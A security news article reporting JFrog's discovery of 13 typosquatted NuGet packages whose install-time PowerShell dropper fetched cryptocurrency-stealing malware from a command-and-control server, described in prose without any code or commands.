The NuGet repository is the target of a new “sophisticated and highly malicious attack” that aims to infect .NET developer systems with cryptocurrency-stealing malware.
The 13 rogue packages, which were downloaded more than 160,000 times in the past month, have since been removed.
“The packages contained a PowerShell script that would run upon installation and trigger a download of a ‘second-stage’ payload, which could be remotely executed,” said JFrog researchers Natan Nehorai and Brian Moussalli.
While NuGet packages have previously been found to contain vulnerabilities and misused to spread phishing links, the development marks the first discovery of packages containing malicious code.
Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net and DiscordRichPresence.API – accounted for 166,000 downloads alone, although it’s also possible that the threat actors artificially inflated the download numbers by using bots to make them work more legitimate.
The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, where fake packages are given names similar to legitimate packages, to trick developers into downloading them.
The malware incorporated into the software packages acts as a dropper script and is designed to automatically run a PowerShell code that retrieves a follow-up binary from a hardcoded server.
As an additional obfuscation mechanism, some packages did not embed a malicious payload directly, but instead obtained it via another booby-captured package as a dependency.
Even more problematic is that the connection to the command-and-control server (C2) is over HTTP (as opposed to HTTPS), making it vulnerable to an adversary-in-the-middle (AiTM) attack.
The second-stage malware is what JFrog describes as a “fully customized executable payload” that can be changed dynamically at will since it is fetched from the C2 server.
Discover the hidden dangers of third-party SaaS apps
Are you aware of the risks associated with third-party app access to your company’s SaaS apps? Join our webinar to learn about the types of permissions granted and how to minimize your risk.
RESERVE YOUR SEAT
The second phase delivers more features that include a crypto thief and an automatic update module that pings the C2 server for an updated version of the malware.
The findings come as the software supply chain has become an increasingly lucrative avenue for compromising developers’ systems and stealthily propagating backdoor code to downstream users.
“This proves that no open source repository is safe from malicious actors,” said Shachar Menashe, senior director at JFrog Security Research, in a statement shared with The Hacker News.
“.NET developers using NuGet remain at high risk of malicious code infecting their environments and should exercise caution when curating open source components for use in their builds—and at every stage of the software development lifecycle—to ensure that the software supply chain remains ensure.”
